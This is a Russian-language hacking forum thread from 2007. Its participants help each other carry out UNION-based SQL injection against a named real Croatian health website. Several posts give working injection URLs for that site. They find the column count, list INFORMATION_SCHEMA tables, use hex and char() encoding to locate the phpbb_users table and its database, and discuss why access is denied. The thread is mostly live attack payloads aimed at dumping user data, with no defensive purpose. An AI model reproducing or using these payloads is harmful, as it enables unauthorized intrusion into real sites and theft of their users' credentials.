29.08.2007, 17:18
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
С нами:
10639074
Репутация:
16
|
|
sql выдает ошибку
_http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,table_name,3+from+INFORMATION_SC HEMA.TABLES/*
есть такой скуль. там выводит таблицу phpbb, и так я знаю впринципе что он там есть, но приобращении.
http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,2,3+from+phpbb/*
или же
_http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+phpbb/*
выдает ошибку
|
|
|
29.08.2007, 17:23
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами:
10447337
Репутация:
807
|
|
13 столбцов.
|
|
|
|
29.08.2007, 17:29
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
С нами:
10639074
Репутация:
16
|
|
Где именно что то я не очень понял
|
|
|
|
29.08.2007, 17:35
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами:
10447337
Репутация:
807
|
|
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/*
гугл, антибоян |
|
|
|
29.08.2007, 17:55
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами:
10495046
Репутация:
2642
|
|
Код:
http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*
ТС, вообщето:
Код:
http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,имя_столбца,5,6,7,8,9,10,11+from+имя_таблицы/*
А не просто имя_таблицы
Последний раз редактировалось NOmeR1; 29.08.2007 в 18:00..
|
|
|
|
29.08.2007, 17:42
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 50
С нами:
10639074
Репутация:
16
|
|
Это я и так знал... я не про это спрашивал... при обращении phpbb_users ошибку выдает
|
|
|
|
29.08.2007, 17:52
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами:
10088966
Репутация:
646
|
|
Ищи, в какой БД таблица лежит
|
|
|
|
29.08.2007, 17:59
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами:
10088966
Репутация:
646
|
|
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/*
--> phpbb_users
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/*
--> beracivi
Однако,
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+beracivi.phpbb_users/*
Не катит...  |
|
|
|
29.08.2007, 18:04
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами:
10109126
Репутация:
1980
|
|
Видимо текущему MySQL юзеру запрещен доступ к БД beracivi
|
|
|
|
29.08.2007, 18:19
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+concat(table_schema,char(46),table_name),2,3,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+where+table_name=0x70687062625f7573657273+limit+22,1/*
Там 22 Базы Данных содержат таблицу phpbb_users и далеко не факт что БД, используемая этим сайтом содержит эту таблицу. На просмотр БД других сайтов у этого пользователя прав не хватает. |
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?448116){kind=avatar}
Комбинированный вид
